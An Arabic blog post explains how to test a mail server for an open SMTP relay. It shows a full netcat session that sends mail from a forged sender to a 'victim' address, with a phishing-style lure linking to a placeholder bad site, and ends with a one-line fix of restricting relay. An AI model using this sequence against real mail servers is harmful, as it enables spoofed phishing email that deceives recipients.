الخميس، 24 أكتوبر 2013
12:45 ص

فحص خادم الـSMTP و خطورة فتح الـ Relay



نعلم جميعا أنه من أهم مراحل الاختراق و من أكثرها فائدة هي مرحلة الـ Service Enumeration  و التي قد تصل بنا من مرحلة جمع معلومات إلى مرحلة اختراق أسهل و أكثر فعالية. في هذا الموضوع سأعطي مثال بسيط عن خادم بريد(Mail Server) يسمح لخاصية الـ Relay و التي -باختصار- تسمح لأجهزة أخرى أن تتصل بخادم البريد على المنفذ 25 لإرسال بريد عن طريقه. هذه المشكلة لا تعتبر ثغرة نظام أو تطبيق , بل عيب في إعداد الـ Mail Server  من قبل مدير النظام.
كل ما علينا هو الاتصال بالمنفذ 25/tcp و من ثم تنفيذ الأوامر الأساسية التي يستخدمها بروتوكول الـSMTP  في إرسال بريد.

[HACKER@machine ~]$ nc -nv Mail-ServerIP 25
Connection to Mail-ServerIP 25 port [tcp/*] succeeded!
220 mail1.domain.com ESMTP Sendmail X.xx.y/X.xx.y; Sun, 25 Mar 2012 11:03:27 +0300
EHLO google.com
250-mail1.domain.com Hello Hacker-PubIP.rev.home.ne.jp [Hacker-PubIP], pleased to meet you
250-ENHANCEDSTATUSCODES
250-PIPELINING
250-8BITMIME
250-SIZE
250-DSN
250-ETRN
250-AUTH DIGEST-MD5 CRAM-MD5
250-DELIVERBY
250 HELP
MAIL FROM: Hacker@fackeemail.com
250 2.1.0 Hacker@email.com… Sender ok
RCPT TO: Victim@mail.com
250 2.1.5 Victim@mail.com… Recipient ok
DATA
354 Enter mail, end with “.” on a line by itself
Hi please  ,,
please find my Pic on
http://badSite.com/profile.html
Thanks
.
250 2.0.0 q2P83R4D009362 Message accepted for delivery
QUIT
221 2.0.0 mail1.domain.com closing connection
نفذنا أوامر بسيطة جدا لكن هناك الكثير لتفعله(اترك الباقي لكم), لتتعرف على المزيد من أوامر البروتوكول SMTP
و الرسالة ستصل إلى  بريد الضحية..
طريقة الحماية : 
للحماية من هذا النوع من الهجمات , يجب أت تقفل أو تحدد الـ Relay في خادم البريد و من الجدار الناري.

0 commentaires:

إرسال تعليق

لا تنسى ان تشارك samir soltani بتعليقك
او نشر الموظوع جزاك الله خيرا